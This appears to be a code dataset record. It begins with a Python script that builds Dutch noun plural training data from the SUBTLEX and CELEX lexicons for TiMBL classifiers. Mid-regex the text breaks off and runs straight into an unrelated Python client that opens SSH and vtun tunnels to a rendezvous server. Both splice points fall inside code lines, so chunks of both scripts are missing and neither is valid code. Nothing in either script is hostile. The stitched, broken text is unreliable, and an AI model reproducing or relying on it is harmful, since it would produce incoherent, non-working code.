+{"seq_id":"457918661","text":"import sys\nimport os\nimport codecs\nimport re\nimport unicodedata\nimport timbl\nimport multiprocessing\nimport random\n\nrandom.seed(80)\n\ntens_path = \"/Volumes/tensusers/timzee/\" if sys.platform == \"darwin\" else \"/vol/tensusers/timzee/\"\noutput_path = tens_path + \"timbl_files2/\"\n\nmistakes = {\n \"S\": [\n \"agressiviteit\",\n \"hij\", # hij's\n \"rijkelui\", # rijkelui's\n \"mån\",\n \"voortgang\", # +++\n \"wéé\",\n \"àl\",\n \"ál\",\n \"afstandsbepaling\",\n \"banning\",\n \"bescherming\",\n \"bestrijding\",\n \"bewapening\",\n \"beëindiging\",\n \"conservering\",\n \"doorzetting\",\n \"functionering\",\n \"geheimhouding\",\n \"herkenning\",\n \"invoeging\",\n \"kalmering\",\n \"massavernietiging\",\n \"ontspanning\",\n \"opvoeding\",\n \"paring\",\n \"reclassering\",\n \"ringeling\",\n \"tekstverwerking\",\n \"uithouding\",\n \"uitlevering\",\n \"vermeerdering\",\n \"vernietiging\",\n \"veroudering\",\n \"verspreiding\",\n \"verwarming\",\n \"verwerking\",\n \"voedselvergiftiging\",\n \"voortplanting\",\n \"watervoorziening\",\n \"zelfbediening\",\n \"zelfverdediging\",\n \"zelfvernietiging\",\n \"aanmelding\",\n \"aanmoediging\",\n \"aantrekking\",\n \"achtervolging\",\n \"ademhaling\",\n \"afleiding\",\n \"aflevering\",\n \"afpersing\",\n \"afstoting\",\n \"bediening\",\n \"belegering\",\n \"beroving\",\n \"besturing\",\n \"betaling\",\n \"beveiliging\",\n \"bevolking\",\n \"bevoorrading\",\n \"beweging\",\n \"dreiging\",\n \"echtscheiding\",\n \"geleiding\",\n \"genezing\",\n \"herhaling\",\n \"investering\",\n \"inwijding\",\n \"lening\",\n \"mening\",\n \"misleiding\",\n \"omgeving\",\n \"ontmoeting\",\n \"ontsnapping\",\n \"ontsteking\",\n \"ontvoering\",\n \"ontwijking\",\n \"opsporing\",\n \"overleving\",\n \"programmering\",\n \"regering\",\n \"riolering\",\n \"samenzwering\",\n \"scheiding\",\n \"scheuring\",\n \"sluiting\",\n \"spanning\",\n \"straling\",\n \"toelating\",\n \"toewijding\",\n \"uitbetaling\",\n \"uitvoering\",\n \"verdediging\",\n \"verdoving\",\n \"vergelding\",\n \"verkenning\",\n \"verkiezing\",\n \"verkrachting\",\n \"verleiding\",\n \"verrassing\",\n \"verscheping\",\n \"verzekering\",\n \"waarneming\",\n \"waarschuwing\",\n \"zuivering\",\n \"zo\", # zon\n \"extreem\", # afgeleid van bijv. naamw. altijd -en\n \"aankoop\", # shouldn't be excluded? aankoopsbon can be found on google / words with prepositions only get -en ?\n \"gebed\", # +++\n \"geluid\", # +++\n \"gevecht\", # +++\n \"gezicht\", # +++\n \"grootheid\",\n \"identiteit\",\n \"illegaal\", # afgeleid van bijv. naamw. 
altijd -en\n \"kwaliteit\",\n \"beleefdheid\",\n \"afstand\", # +++ 5\n \"bedrijf\", # +++ 5\n \"bruid\", # +++\n \"bruiloft\", # +++\n \"dam\", # ww\n \"groep\", # ww\n \"grond\", # ww\n \"kalf\", # kalveren\n \"naam\", # +++\n \"oorlog\", # +++ 25 maar ook >25 samenstellingen\n \"persoonlijkheid\",\n \"publiek\", # +++\n \"schip\", # schepen\n \"schoonheid\",\n \"seizoen\", # +++\n \"snelheid\",\n \"toegang\", # +++\n \"universiteit\",\n \"god\", # +++\n \"cent\", # maat/eenheid\n \"karaat\", # maat/eenheid\n \"punt\" # maat/eenheid\n ],\n \"EN\": [\n \"sportster\", # different lexemes\n \"gebeuren\", # gebeuren is treated as plural\n \"demon\" # should not be excluded!\n ],\n \"OTHER\": [\n \"room\", # ww\n \"zijn\", # ww\n \"bankman\", # banklui\n \"bootsman\", # bootslui\n \"buitenman\", # buitenlui\n \"jus\", # different lexemes\n \"man\", # mannekes\n \"persman\", # perslui\n \"koren\", # komrt\n \"bos\", # ww\n \"kantoorpik\", # kantoorpikkies\n \"kop\", # koppies\n \"kwaad\", # kwaaien\n \"penny\", # pence\n \"das\", # das's\n \"zus\", # zus's\n \"den\" # different lexemes + weird singular dede dt\n ]\n}\n\n# all verbs in van dale\npossible_verbs = [\n \"vinger\", \"test\", \"film\", \"regel\", \"nagel\", \"boete\", \"tip\", \"trip\",\n \"club\", \"type\", \"sprint\", \"flirt\", \"teken\", \"keten\", \"tafel\",\n \"lade\", \"speech\", \"hint\", \"leg\", \"lobby\", \"pass\", \"pik\", \"ram\", \"stel\",\n \"stop\", \"storm\", \"toer\", \"tongen\", \"week\", \"vuur\", \"zon\", \"aanval\",\n \"barbecue\", \"kajak\", \"grieve\"\n]\n\nforbidden_words = [\n \"band\", # die muziek maken\n \"stuk\", # 4 stuks\n \"jaar\", # 2e jaars\n \"klasse\", # klasse vs. klas\n \"stand\", # leenwoord 'stents'\n \"chatbox\", # nog niet goed verwerkt\n \"gang\", # leenwoord 'gengs'\n \"zone\", # zonen is meervoud van zoon\n \"pool\", # leenwoord 'poel'\n \"strip\", # boekjes vs. strippenkaart (en ww)\n \"kinder\", # andere 'speelse' betekenis, bovendien is het meervoud hier ers vs. eren\n \"atlete\", # also exclude female forms for which the plural en is shared with male forms\n \"advocate\",\n \"echtgenote\",\n \"blind\", # afgeleid van bijv. naamw. altijd -en\n \"bal\", # 2 betekenissen\n \"bloed\", # heeft geen meervoud; ww\n \"laat\", # afgeleid van bijv. naamw. altijd -en\n \"blad\", # bladen and bladeren are different words\n \"dijbeen\", # different words\n \"dood\", # afgeleid van bijv. naamw. altijd -en\n \"gal\", # ww\n \"lomp\", # afgeleid van bijv. naamw. altijd -en\n \"neer\", # shouldn't be excluded? Neer is a village in Limburg; zij zijn Neers\n \"provinciaal\", # afgeleid van bijv. naamw. altijd -en\n \"rede\", # plural reden confusable with singular reden\n \"sar\", # ww\n \"sjiek\", # afgeleid van bijv. naamw. altijd -en\n \"sociaal\", # afgeleid van bijv. naamw. altijd -en\n \"spionne\",\n \"verstand\", # +++\n \"volbloed\", # afgeleid van bijv. naamw. 
altijd -en\n \"l\",\n \"pop\", # 2 meanings / ww\n \"portier\", # 2 meanings\n \"net\", # 2 meanings\n \"water\", # ww\n \"post\" # ww\n]\n\n# moeten we nog iets met woorden als 'advocate'?\n\nfrivative_voicing = {\n \"f\": \"v\",\n \"v\": \"f\",\n \"s\": \"z\",\n \"z\": \"s\",\n \"S\": \"Z\",\n \"Z\": \"S\",\n \"x\": \"G\",\n \"G\": \"x\"\n}\n\ncompound_exceptions = [\n \"a\",\n \"aal\",\n \"aan\",\n \"aar\",\n \"aard\",\n \"aarster\",\n \"aat\",\n \"ade\",\n \"age\",\n \"air\",\n \"ament\",\n \"ant\",\n \"antie\",\n \"ares\",\n \"arij\",\n \"ateur\",\n \"atie\",\n \"ator\",\n \"atorium\",\n \"atuur\",\n \"biliteit\",\n \"der\",\n \"derij\",\n \"dij\",\n \"dom\",\n \"e\",\n \"egge\",\n \"eiteit\",\n \"el\",\n \"elaar\",\n \"eling\",\n \"ement\",\n \"en\",\n \"enaar\",\n \"enares\",\n \"endom\",\n \"enier\",\n \"enij\",\n \"enis\",\n \"enist\",\n \"ent\",\n \"entie\",\n \"er\",\n \"erd\",\n \"eres\",\n \"erie\",\n \"erij\",\n \"erik\",\n \"ernij\",\n \"ertje\",\n \"es\",\n \"ess\",\n \"esse\",\n \"eteit\",\n \"etje\",\n \"eur\",\n \"euse\",\n \"foon\",\n \"heid\",\n \"iaal\",\n \"iaat\",\n \"iciteit\",\n \"ie\",\n \"ieel\",\n \"ief\",\n \"iek\",\n \"ier\",\n \"igheid\",\n \"ij\",\n \"ijn\",\n \"in\",\n \"ing\",\n \"ionair\",\n \"ionisme\",\n \"isme\",\n \"ist\",\n \"iste\",\n \"iteit\",\n \"itie\",\n \"itor\",\n \"je\",\n \"ling\",\n \"loos\",\n \"nce\",\n \"nij\",\n \"nis\",\n \"oir\",\n \"oos\",\n \"otor\",\n \"pje\",\n \"s\",\n \"schap\",\n \"se\",\n \"sel\",\n \"sie\",\n \"st\",\n \"ste\",\n \"ster\",\n \"t\",\n \"te\",\n \"tenis\",\n \"tie\",\n \"tje\",\n \"ueel\",\n \"utie\",\n \"uur\"\n]\n\n\ndef strip_accents(s):\n return ''.join(c for c in unicodedata.normalize('NFD', s) if unicodedata.category(c) != 'Mn')\n\n\nprint(\"Loading SUBTLEX\")\nverb_deletion_list = []\nread_mode = False\nLemma = \"\"\nPOS = \"\"\nnoun_dict = {}\nverb_dict = {}\ncount_freq = 0\ncum_freq = 0\nwith codecs.open(tens_path + \"other/SUBTLEX-NL.master.txt\", \"r\", \"utf-8\") as f:\n for line in f:\n if read_mode:\n Wordform, SubPOS, FREQcount = unicodedata.normalize(\"NFC\", line.replace('\\x92', \"'\"))[:-1].split(\"\\t\")[2:5] # NFKD\n count_freq += int(FREQcount)\n if POS == \"N\":\n if 'ev,' in SubPOS: # include option for words like meisje\n if Wordform[-2:] == \"je\" and 'dim' in SubPOS: # for words like meisje (only dim) but will also create new entry for wagentje under wagen\n if Wordform in noun_dict:\n if 'ev' in noun_dict[Wordform]:\n noun_dict[Wordform]['ev'] += int(FREQcount)\n else:\n noun_dict[Wordform]['ev'] = int(FREQcount)\n else:\n noun_dict[Wordform] = {'ev': int(FREQcount)}\n elif Lemma == Wordform and 'basis' in SubPOS: # beesten would count towards ev without Lemma == Wordform\n if 'ev' in noun_dict[Lemma]:\n noun_dict[Lemma]['ev'] += int(FREQcount)\n else:\n noun_dict[Lemma]['ev'] = int(FREQcount)\n elif 'mv,' in SubPOS:\n if Wordform[-3:] == \"jes\" and 'dim' in SubPOS: # for words like meisjes\n if Wordform[:-1] in noun_dict:\n if \"S\" in noun_dict[Wordform[:-1]]:\n noun_dict[Wordform[:-1]][\"S\"] += int(FREQcount)\n else:\n noun_dict[Wordform[:-1]][\"S\"] = int(FREQcount)\n else:\n noun_dict[Wordform[:-1]] = {\"S\": int(FREQcount)}\n elif 'basis' in SubPOS and Lemma != Wordform:\n if Wordform[-2:] in [\"en\", \"ën\"] and (len(Wordform) - len(Lemma)) < 4: # exclude kinderen and koeien but not bessen or assurantiën\n if len(Wordform) > 3:\n if Wordform[-3] == \"i\" and Lemma[-1] != \"i\" and Wordform[-2] != \"ë\":\n pl_type = \"OTHER\"\n elif Wordform[-3] in [\"d\", \"t\"] and 
Lemma[-1] not in [\"d\", \"t\"] and (len(Wordform) - len(Lemma)) > 1: # exclude lijkwa - lijkwaden\n if Wordform[-4] in frivative_voicing:\n alt_fric = frivative_voicing[Wordform[-4]]\n else:\n alt_fric = \"NALALA\"\n if Lemma[-3:] in [Wordform[-4] + Wordform[-2:], alt_fric + Wordform[-2:]]: # these are verbs marked as nouns\n verb_deletion_list.append(Lemma)\n pl_type = \"\"\n elif Wordform[-3] == \"d\": # add spaden plural in spa lemma to spade lemma\n if Wordform[:-1] in noun_dict: # remaining verbs will be excluden by celex\n if \"EN\" in noun_dict[Wordform[:-1]]:\n noun_dict[Wordform[:-1]][\"EN\"] += int(FREQcount)\n else:\n noun_dict[Wordform[:-1]][\"EN\"] = int(FREQcount)\n else:\n noun_dict[Wordform[:-1]] = {'ev': 0, \"EN\": int(FREQcount)}\n pl_type = \"\"\n elif Lemma[-3:] == Wordform[-3:]:\n verb_deletion_list.append(Lemma)\n pl_type = \"\"\n else:\n pl_type = \"EN\"\n else:\n pl_type = \"EN\"\n elif Wordform[-1] == \"s\": # exclude bosjes that has been tagged as mv,basis; and crisis that is pluralized as crises\n if (len(Wordform) - len(Lemma)) == 1:\n pl_type = \"S\"\n elif (len(Wordform) - len(Lemma)) == 2 and Wordform[-2] == \"'\":\n if Wordform[-3] not in [\"s\"]: # excludes zus's but nor ex's\n pl_type = \"S\"\n else:\n pl_type = \"OTHER\"\n elif (len(Wordform) - len(Lemma)) == 2 and Wordform[-2] == \"e\": # take care of words like speeches\n pl_type = \"S\"\n elif ((len(Wordform) - len(Lemma)) == 2 or (len(Wordform) - len(Lemma)) == 3) and Wordform[-3:] == \"des\":\n if Wordform[:-1] in noun_dict: # add zijdes plural in zij lemma to zijde lemma\n if \"S\" in noun_dict[Wordform[:-1]]:\n noun_dict[Wordform[:-1]][\"S\"] += int(FREQcount)\n else:\n noun_dict[Wordform[:-1]][\"S\"] = int(FREQcount)\n else:\n noun_dict[Wordform[:-1]] = {'ev': 0, \"S\": int(FREQcount)}\n pl_type = \"\"\n else:\n if len(Wordform) > 3:\n if Wordform[-3:] == \"jes\":\n pl_type = \"\"\n elif Lemma == \"giraf\":\n pl_type = \"S\"\n else:\n pl_type = \"OTHER\" # exclude mislabeled diminuatives as plurals\n else:\n pl_type = \"OTHER\"\n else: # add re restriction so that strategi n isn't a plural\n if re.search(r'[a-z][a-z]', Wordform[-2:]):\n pl_type = \"OTHER\"\n if pl_type in noun_dict[Lemma]: # Wordform later vervangen door pl_type: 'en', 's', 'other'\n noun_dict[Lemma][pl_type] += int(FREQcount)\n else:\n if pl_type != \"\":\n noun_dict[Lemma][pl_type] = int(FREQcount)\n elif POS == \"WW\": # let's ignore past tense for now\n if SubPOS in [\"pv,tgw,mv\"]:\n if Wordform == Lemma:\n verb_dict[Lemma] += int(FREQcount)\n if count_freq == cum_freq:\n read_mode = False\n else:\n Lemma, POS, Wordform, SubPOS, FREQcount = unicodedata.normalize(\"NFC\", line.replace('\\x92', \"'\"))[:-1].split(\"\\t\")[:5]\n# if Lemma not in [\"@\", \"%\", \"'\"] and POS == \"N\":\n if not re.search(r\"[0-9@%'., ]\", Lemma) and POS == \"N\":\n read_mode = True\n if Lemma == \"hersenen\":\n Lemma = \"hersen\"\n noun_dict[Lemma] = {'ev': 0}\n elif Lemma == \"hersens\":\n Lemma = \"hersen\"\n elif Lemma == \"ideeën\":\n Lemma = \"idee\"\n else:\n if Lemma not in noun_dict:\n noun_dict[Lemma] = {'ev': 0}\n cum_freq = int(FREQcount)\n count_freq = 0\n elif not re.search(r\"[0-9@%'.?, ]\", Lemma) and re.search(r\"([eao]i|[qwrtpsdfghjklzxcvbnm])en$\", Lemma) and POS == \"WW\" and len(Lemma) > 3:\n read_mode = True\n if Lemma not in verb_dict:\n verb_dict[Lemma] = 0\n cum_freq = int(FREQcount)\n count_freq = 0\n else:\n continue\n\n# remove mistakes\nfor lab in mistakes:\n for w in mistakes[lab]:\n if lab in noun_dict[w]:\n del 
noun_dict[w][lab]\n else:\n print(w)\n\n# remove verbs\nfor v in list(set(verb_deletion_list)):\n del noun_dict[v]\n\nnoun_dict = {k: noun_dict[k] for k in noun_dict if len(noun_dict[k]) > 1}\n\n# remove forbidden words\nfor w in forbidden_words:\n if w in noun_dict:\n del noun_dict[w]\n\nverb_dict = {k: verb_dict[k] for k in verb_dict if verb_dict[k] > 0}\n\nprint(\"Loading CELEX\")\ncelex = {}\ncelex_verbs = {}\nwith codecs.open(tens_path + \"other/DML.CD\", \"r\", \"utf-8\") as f:\n DML = f.readlines()\n\nwith codecs.open(tens_path + \"other/DPL.CD\", \"r\", \"utf-8\") as f: # do we need DPW so 'huisje' is actually matched in CELEX?\n DPL = f.readlines()\n\nDMW = {}\nwith codecs.open(tens_path + \"other/DMW.CD\", \"r\", \"utf-8\") as f: # We need it to determine wordclass, including diminuatives\n for line in f:\n l_list_dmw = line[:-1].split(\"\\\\\")\n dmw_word = l_list_dmw[1]\n dmw_id = l_list_dmw[3]\n word_type = l_list_dmw[4]\n if dmw_word in DMW:\n if dmw_id in DMW[dmw_word]:\n DMW[dmw_word][dmw_id].append(word_type)\n else:\n DMW[dmw_word][dmw_id] = [word_type]\n else:\n DMW[dmw_word] = {dmw_id: [word_type]}\n\n\nfor line_num, line in enumerate(DML, 0):\n l_list = line[:-1].split(\"\\\\\")\n word = l_list[1]\n lem_id = l_list[0]\n word_type = l_list[12]\n word_type = word_type[-2] if len(word_type) > 2 else \"\"\n if word not in celex:\n if word_type == \"\":\n if word in DMW:\n if lem_id in DMW[word]:\n if (\"de\" in DMW[word][lem_id]) or (\"e\" in DMW[word][lem_id]):\n word_type = \"N\"\n elif \"i\" in DMW[word][lem_id]:\n word_type = \"V\"\n else:\n word_type = \"\"\n# word_type = \"N\" if (\"de\" in DMW[word][lem_id]) or (\"e\" in DMW[word][lem_id]) else \"\"\n if word_type == \"N\":\n l_list_dpl = DPL[line_num][:-1].split(\"\\\\\")\n assert word == l_list_dpl[1]\n phon = l_list_dpl[3] # 3 instead of 6 so 'apenootje' gets the correct features\n parse = l_list[-8] # use different parse for words with different parses\n # if len(parse) > 0: # exclude words for which compounding information is not present, or maybe not do this because it excludes a lot of words..\n compound = \"+\" in parse # check for compounds\n # extract final part of compound using DML\n if compound:\n fin_word = parse.split(\"+\")[-1]\n compound = fin_word[:]\n if len(phon) > 2:\n celex[word] = {\"phones\": phon, \"compound\": compound}\n elif word_type == \"V\": # and add_verbs:\n l_list_dpl = DPL[line_num][:-1].split(\"\\\\\")\n assert word == l_list_dpl[1]\n phon = l_list_dpl[6]\n parse = l_list[-8]\n compound = \"+\" in parse\n if compound:\n fin_word = parse.split(\"+\")[-1]\n compound = fin_word[:]\n if len(phon) > 2:\n celex_verbs[word] = {\"phones\": phon, \"compound\": compound}\n\n\ndef stressMarking(compound, cel):\n num_syl_in_word = len(re.findall(r'[euoa]+(?=[^euioa]*)|(?= 0 else abs(extra_syls) * [\"=\"] + syllables\n features = []\n stress = []\n for syl in syllables:\n if syl == \"=\":\n features.extend([\"=\", \"=\", \"=\"])\n stress.append(\"-\")\n else:\n # check stress\n if syl[0] == \"'\":\n stress.append(\"+\")\n syl = syl[1:]\n else:\n stress.append(\"-\")\n # find onset, nucleus, and coda\n onset = re.search(r'^[{}]+'.format(\"\".join(medeklinkers)), syl)\n onset = onset.group() if onset else \"=\"\n nucleus = re.search(r'[{}]+'.format(\"\".join(klinkers)), syl)\n nucleus = nucleus.group() if nucleus else \"=\"\n coda = re.search(r\"[{}]+$\".format(\"\".join(medeklinkers)), syl)\n coda = coda.group() if coda else \"=\"\n features.extend([onset, nucleus, coda])\n return features, 
stress\n\n\n# up until here everything everything can be global (for multiprocessing)\ndef runTimbl(instances, metric, shared_lemmas, type_merge, num_syl, nn_k, dist_weight, add_var, add_invar, add_verbs, verb_class):\n add_var_lab = \"_both\" if add_var and add_invar else \"_invar\" if add_invar and not add_var else \"_var\"\n add_verb_lab = \"_\" + verb_class if add_verbs else \"\"\n type_merge_lab = \"_merge\" if instances == \"type\" and type_merge else \"\"\n shrd_lab = \"\" if shared_lemmas else \"_noshare\"\n model_name = \"pl_{}_{}{}_{}syl_k{}_{}{}{}{}\".format(instances, metric, type_merge_lab, str(num_syl), str(nn_k), dist_weight, add_var_lab, shrd_lab, add_verb_lab)\n classifier = timbl.TimblClassifier(model_name + \".master\", \"-m{}:I1 -k {} -d {} -G 0\".format(metric, nn_k, dist_weight), dist=True) # give unique name for multiprocessing\n\n dataset_invar2 = dataset_invar.copy()\n if not shared_lemmas: # remove words from invar that share the final lemma with a word in var\n del_nouns = []\n for w in dataset_var:\n if w in invar_compounds: # e.g. infectieziekte in invar; ziekte in var\n for n in invar_compounds[w]:\n if n in dataset_invar2:\n del_nouns.append(n)\n del dataset_invar2[n]\n w_str = strip_accents(w)\n if \"compound\" in celex[w_str]:\n if celex[w_str][\"compound\"] in invar_compounds: # e.g. infectieziekte in invar; huidziekte in var\n for m in invar_compounds[celex[w_str][\"compound\"]]:\n if m in dataset_invar2:\n del_nouns.append(m)\n del dataset_invar2[m]\n if celex[w_str][\"compound\"] in dataset_invar2: # e.g. juf in invar; schooljuf in var\n del_nouns.append(celex[w_str][\"compound\"])\n del dataset_invar2[celex[w_str][\"compound\"]]\n\n invar_strings = []\n merge_feats = []\n for wrd in dataset_invar2:\n feat, strs = getFeatures(wrd, dataset_invar2, num_syl)\n pl_class = dataset_invar2[wrd]['class']\n compound_word_syls = len(re.findall(r'[euoa]+(?=[^euioa]*)|(? 1:\n # There was at least one ':' in the RDV server name, assume it is the TCP port number\n rdv_server_host = args.rdv_server.split(':')[0]\n rdv_server_tcp_port = int(args.rdv_server.split(':')[1])\n \n master_dev = MasterDev(username=username, logger=logger, rdv_server_host=rdv_server_host, rdv_server_tcp_port=rdv_server_tcp_port)\n \n msg = 'Connecting to RDV server'\n if args.with_stunnel:\n msg += ' over an SSL tunnel'\n else:\n msg += ' directly over SSH (' + str(master_dev.get_rdv_server_host()) + ')'\n msg += ' as user account \"' + username + '\"'\n logger.info(msg)\n master_dev.rdv_server_connect(using_stunnel=args.with_stunnel)\n \n if args.list_onsite:\n print('Currently available onsite devices:')\n total_onsite_devs = 0\n for onsite_dev in master_dev.get_online_onsite_dev():\n total_onsite_devs += 1\n print(onsite_dev)\n if total_onsite_devs == 0:\n print('No onsite device currently available')\n else:\n print('Total: ' + str(total_onsite_devs))\n if args.onsite is None:\n exit(0) # List only mode, do not connect\n \n if args.onsite is None:\n print(progname + ': Error: --onsite argument is mandatory if --list-onsite is not used', file=sys.stderr)\n exit(1)\n else:\n remote_onsite=args.onsite # The remote onsite dev to which we want to connect\n \n # Prepare a threading event to be set when the session drops. Setting this event will terminate this script\n termination_event = threading.Event()\n termination_event.clear()\n \n logger.info('Connecting to onsite ' + remote_onsite)\n unavail_onsite_msg = 'Could not connect to ' + remote_onsite + '. It is not connected (yet). 
Waiting'\n while True:\n onsite_dev_list = master_dev.get_online_onsite_dev()\n if remote_onsite in onsite_dev_list: # We saw our onsite dev available, continue\n break\n else:\n if not unavail_onsite_msg is None:\n logger.warning(unavail_onsite_msg)\n unavail_onsite_msg = None\n \n time.sleep(10)\n \n master_dev.send_lan_ip_address_for_iface('eth0')\n master_dev.run_set_tunnel_mode(args.tunnel_mode)\n #master_dev.run_set_tunnelling_dev_uplink_type('lan')\n logger.info('Selecting onsite dev ' + remote_onsite + ' for this session')\n master_dev.run_connect_to_onsite_dev(remote_onsite) # Now connect to this remote\n \n # Sanity check\n if master_dev.run_get_role() != 'master':\n logger.error('Tundev shell returns a role that does not match this script (master)')\n raise Exception('RoleMismatch')\n \n tunnel_mode = master_dev.run_get_tunnel_mode()\n \n locally_redirected_vtun_server_port = 5000\n \n extremity_if = None\n event_secondary_if_down = threading.Event()\n event_secondary_if_down.clear()\n dbus.mainloop.glib.DBusGMainLoop(set_as_default=True) # Use Glib's mainloop as the default loop for all subsequent code\n \n try:\n bus = dbus.SystemBus()\n proxy = bus.get_object(DBUS_NAME, DBUS_OBJECT_ROOT)\n extremity_if = proxy.GetInterface(dbus_interface=DBUS_SERVICE_INTERFACE)\n logger.debug('Read extremity network interface ' + extremity_if + ' from D-Bus call')\n # If we got a D-Bus extremity interface, carry on watching D-Bus signals for interface removal\n def dBusInterfaceRemovedHandler(ifname, **kwargs):\n logger.info('Received InterfaceRemoved D-Bus signal for interface ' + ifname)\n if ifname == extremity_if:\n event_secondary_if_down.set()\n termination_event.set()\n \n dbus_loop = gobject.MainLoop()\n \n # Allow secondary threads to run during the mainloop\n gobject.threads_init() # Allow the mainloop to run as an independent thread\n dbus.mainloop.glib.threads_init()\n \n # Run the D-Bus thread in background\n dbus_loop_thread = threading.Thread(target=dbus_loop.run)\n dbus_loop_thread.setDaemon(True)\t# dbus loop should be forced to terminate when main program exits\n dbus_loop_thread.start()\n \n proxy.connect_to_signal('InterfaceRemoved',\n dBusInterfaceRemovedHandler,\n dbus_interface=DBUS_SERVICE_INTERFACE,\n message_keyword='dbus_message') # Set a callback for the InterfaceRemoved D-Bus signal\n \n except dbus.DBusException:\n import traceback\n extremity_if = None\n traceback.print_exc() # Dump exception but continue anyway\n \n if extremity_if is None or extremity_if == '':\n extremity_if='eth0'\n \n logger.debug('Going to setup vtun tunnel in mode ' + tunnel_mode + ' with extremity interface ' + extremity_if)\n vtun_client_config = master_dev.get_client_vtun_tunnel(tunnel_mode,\n extremity_if=extremity_if,\n lan_if='eth0',\n vtun_server_hostname='127.0.0.1',\n vtun_server_port=locally_redirected_vtun_server_port,\n vtund_exec='/usr/sbin/vtund',\n vtund_use_sudo=True,\n nat_to_external=False # Never use a NAT on master devices\n ) # Returns a pythonvtunlib.client_vtun_tunnel object\n \n vtun_client = vtun_client_config.to_client_vtun_tunnel_object()\n master_dev._assert_ssh_escape_shell()\n logger.debug('Adding ssh port redirection to ssh session')\n master_dev.ssh_port_forward(locally_redirected_vtun_server_port,\n master_dev.ssh_remote_tcp_port)\n \n vtun_client.start()\n logger.debug('Started local vtun client as PID ' + str(vtun_client._vtun_pid))\n if tunnel_mode == 'L3':\n try:\n vtun_client_config.check_ping_peer()\n except:\n logger.error('Peer does not respond to 
pings inside the tunnel')\n session_output = vtun_client.get_output()\n session_output = '|' + session_output.replace('\\n', '\\n|') # Prefix the whole output with a | character so that dump is easily spotted\n if session_output.endswith('|'): # Remove the last line that only contains a | character\n session_output = session_output[:-1]\n while session_output.endswith('|\\n'): # Get rid of the last empty line(s) that is/are present most of the time\n session_output = session_output[:-2]\n print('Tunnel was not properly setup (no ping response from peer). Output from vtund client was:\\n' + session_output, file=sys.stderr)\n raise Exception('TunnelNotWorking')\n logger.info('Tunnel to RDV server is up (got a ping reply)')\n if args.session_time >= 0:\n print('Now sleeping ' + str(args.session_time/60) + ' min ' + str(args.session_time%60) + ' s')\n time.sleep(args.session_time)\n else:\n print('Remote session to onsite ' + remote_onsite + ' is now established')\n remote_onsite_ip_config = master_dev.get_remote_onsite_ip_config()\n if remote_onsite_ip_config:\n print('Remote onsite has it LAN interface configured with IP address ' + remote_onsite_ip_config)\n #We prepare 3 events to be set in order to have a better idea of what failed\n event_ssh_down = threading.Event()\n event_ssh_down.clear()\n event_vtun_down = threading.Event()\n event_vtun_down.clear()\n event_signal_received = threading.Event()\n event_signal_received.clear()\n \n #To set the event if we catch SIGINT, SIGTERM or SIGQUIT\n def signalHandler(signum, frame):\n logger.info('Handled signal ' + str(signum))\n event_signal_received.set()\n termination_event.set()\n \n #Thread to run to wait a process to end and then set the event\n class processWaiter(threading.Thread):\n def __init__(self, process_to_wait, event_to_set_for_logging):\n super(processWaiter,self).__init__()\n self.setDaemon(True)\n self._process = process_to_wait\n self.log_event = event_to_set_for_logging\n def run(self):\n self._process.wait()\n self.log_event.set()\n termination_event.set()\n \n #Create 2 of those thread : one for ssh and one for vtun client\n ssh_waiter = processWaiter(master_dev.get_ssh_process(), event_ssh_down)\n vtun_client_waiter = processWaiter(vtun_client.get_vtun_process(), event_vtun_down) #FIXME: Change python vtunlib in order to remove the direct access to 'private' attribute\n \n #Launch those threads\n ssh_waiter.start()\n vtun_client_waiter.start()\n \n #We connect signal to handler\n signal.signal(signal.SIGINT, signalHandler)\n signal.signal(signal.SIGTERM, signalHandler)\n signal.signal(signal.SIGQUIT, signalHandler)\n #We wait for the event in block mode and therefore the session will last 'forever' if neither ssh nor vtun client falls down \n while not termination_event.is_set():\n termination_event.wait(1) #Wait without timeout can't be interrupted by unix signal so we wait the signal with a 1 second timeout and we do that until the event is set.\n #We disconnect signal from handler\n signal.signal(signal.SIGINT, signal.SIG_DFL)\n signal.signal(signal.SIGTERM, signal.SIG_DFL)\n signal.signal(signal.SIGQUIT, signal.SIG_DFL)\n \n if event_signal_received.is_set():\n logger.info('Stopped due to UNIX signal received')\n if event_ssh_down.is_set():\n logger.error('Stopped due to a dropped SSH connection ')\n if event_vtun_down.is_set():\n logger.error('Stopped due to a dropped vtun tunnel')\n if event_secondary_if_down.is_set():\n logger.error('Stopped due to a de-configuration of secondary extremity interface')\n 
print('...done')\n vtun_client.stop()\n session_output = vtun_client.get_output()\n session_output = '|' + session_output.replace('\\n', '\\n|') # Prefix the whole output with a | character so that dump is easily spotted\n if session_output.endswith('|'): # Remove the last line that only contains a | character\n session_output = session_output[:-1]\n while session_output.endswith('|\\n'): # Get rid of the last empty line(s) that is/are present most of the time\n session_output = session_output[:-2]\n print('Now exitting tundev script. For debug, output from vtund client was:\\n' + session_output, file=sys.stderr)\n master_dev.exit()\n","sub_path":"masterdev_script.py","file_name":"masterdev_script.py","file_ext":"py","file_size_in_byte":17199,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
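One detail of the session loop above is worth isolating: as the script's own comment notes, `Event.wait()` with no timeout cannot be interrupted by UNIX signals on some interpreter versions, which is why it polls with a 1-second timeout instead. A minimal self-contained sketch of that pattern (the 3-second timer is a stand-in for a worker that eventually finishes):

```python
import signal
import threading

termination_event = threading.Event()

def on_signal(signum, frame):
    # Runs in the main thread; just flag the main loop to exit.
    termination_event.set()

for sig in (signal.SIGINT, signal.SIGTERM):
    signal.signal(sig, on_signal)

# Stand-in for a worker that eventually finishes on its own.
threading.Timer(3.0, termination_event.set).start()

# Polling with a short timeout keeps the main thread responsive to
# signals; a bare wait() would block them on some interpreter versions.
while not termination_event.is_set():
    termination_event.wait(1)

print('clean shutdown')
```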
